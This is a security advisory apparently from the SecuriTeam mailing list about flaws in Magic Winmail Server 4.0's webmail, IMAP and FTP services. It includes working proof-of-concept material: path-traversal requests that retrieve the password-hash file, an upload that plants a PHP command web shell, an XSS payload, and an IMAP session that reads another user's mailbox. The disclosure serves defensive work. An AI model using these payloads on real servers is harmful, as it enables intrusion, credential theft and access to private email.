The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Magic Winmail Server's Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
" <http://www.magicwinmail.net/> Magic Winmail Server is an enterprise
class mail server software system offering a robust feature set, including
extensive security measures. Winmail Server supports SMTP, POP3, IMAP,
Webmail, LDAP, multiple domains, SMTP authentication, SPAM protection,
anti-virus protection, SSL/TLS security, Network Storage, remote access,
Web-based administration, and a wide array of standard email options such
as filtering, signatures, real-time monitoring, archiving, and public
email folders."
Multiple vulnerabilities were found in Magic Winmail Server's Webmail
service, IMAP service and FTP service.
DETAILS
Vulnerable Systems:
* Magic Winmail Server version 4.0 build 1112
Winmail Server's PHP-based Webmail has vulnerabilities that may be
exploited to download arbitrary files from the server, to upload files to
arbitrary directories, and to conduct Cross-Site Scripting attacks.
Directory traversal vulnerability in Winmail Server's IMAP service gives
the malicious user the ability to read arbitrary user's emails,
create/delete arbitrary directories on the server, and/or to retrieve
arbitrary files from the server. In addition, Winmail Server's FTP service
does not validate the IP address supplied in a PORT command. This may be
exploited to perform port scan from the FTP server.
Vulnerabilities in Webmail:
The download.php script allows a user to download his/her email file
attachment. Lack of input parameter sanitation allows a logon mail user to
retrieve arbitrary files from the server by supplying specially crafted
input parameters to download.php. The following two requests will retrieve
userauth.cfg, which contains users' MD5 password hashes.
http://[hostname]:6080/download.php?
sid=656041e927559a2ff& // this must be the current session id
tid=0&folder=INBOX&ix=0&part=1&optype=download&type=nonmime
&filename=Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw==
// Note Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw== is the base64 encoding of
/../../../../userauth.cfg
http://[hostname]:6080/download.php?
sid=656041e927559a2ff&
tid=0&folder=INBOX&ix=0&part=1&optype=download&cache=1
&filename=/../../../../userauth.cfg
The upload.php scripts allows a mail user to upload his/her email file
attachment when composing an email. Lack of input sanitation of the
supplied filename allows a logon mail user to upload files to arbitrary
location on the server. This may be exploited to upload arbitrary PHP
scripts into the webmail directory. Successful exploitation on the default
installation of Winmail server will allow execution of arbitrary PHP
scripts with LOCAL SYSTEM privilege.
-----------------------------31140333525651
Content-Disposition: form-data; name="userfile1";
filename="/../../../a.php"
Content-Type: application/download
<?php
system($_GET[cmd]);
?>
The /admin/user.php script allows the Webmail administrator to view
webmail users' username, fullname, description, and company name. A
malicious user may input JavaScript in his own personal info using
userinfo.php. Due to lack of filtering of HTML special characters, these
JavaScript will execute on the Webmail administrator's browser when the
administrator accesses the /admin/user.php script. These JavaScripts may
be crafted to steal the administrator's session cookie, etc. For example,
the user may set his description to
<script>alert(document.form1.sid.value);</script>
Directory Traversal Vulnerability in IMAP Service:
Directory traversal vulnerability was found in several of Winmail Server's
IMAP commands. These vulnerable commands may be exploited by a malicious
logon user to read arbitrary user's emails, create/delete arbitrary
directories on the server, and/or to retrieve arbitrary files from the
server. IMAP commands like CREATE, EXAMINE, SELECT and DELETE are affected
by this vulnerability.
The following transcript of an IMAP session illustrates this:
[c:\]nc X.X.X.X 143
* OK IMAP4 ready! localhost Winmail Mail Server MagicWinmail Extend IMAP
101
1 LOGIN "test" "password" // login as user test
1 OK LOGIN OK.
2 SELECT "../test2/INBOX" // selected user test2's mailbox
* FLAGS (\Answered \Deleted \Draft \Seen \Recent)
* OK [PERMANENTFLAGS (\Answered \Draft \Flagged \Seen)]
* 1 EXISTS
* 0 RECENT
* OK [UNSEEN 1] Message 1 is unseen.
* OK [UIDNEXT 2] Predicted valid
* OK [UIDVALIDITY 1105791403] UIDs valid
2 OK [READ-WRITE] OK SELECT completed.
3 UID fetch 1:1 (UID RFC822.SIZE FLAGS BODY.PEEK[]) // retrieve test2's
mail
* 1 FETCH (UID 1 FLAGS () RFC822.SIZE 271 BODY[] {422}
Return-Path:
Delivered-To: test2@xxx.xx
Received: (winmail server invoked for smtp delivery); Sat, 15 Jan 2005
20:16:18
+0800
Received: (winmail server invoked for report); Sat, 15 Jan 2005 20:16:18
+0800
From: postmaster@xxx.xx
To: test2@xxx.xx
Date: Sat, 15 Jan 2005 20:16:18 +0800
Subject: welcome
Hi, test2
Welcome to use the mail system!
Your mail address is test2@xxx.xx.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
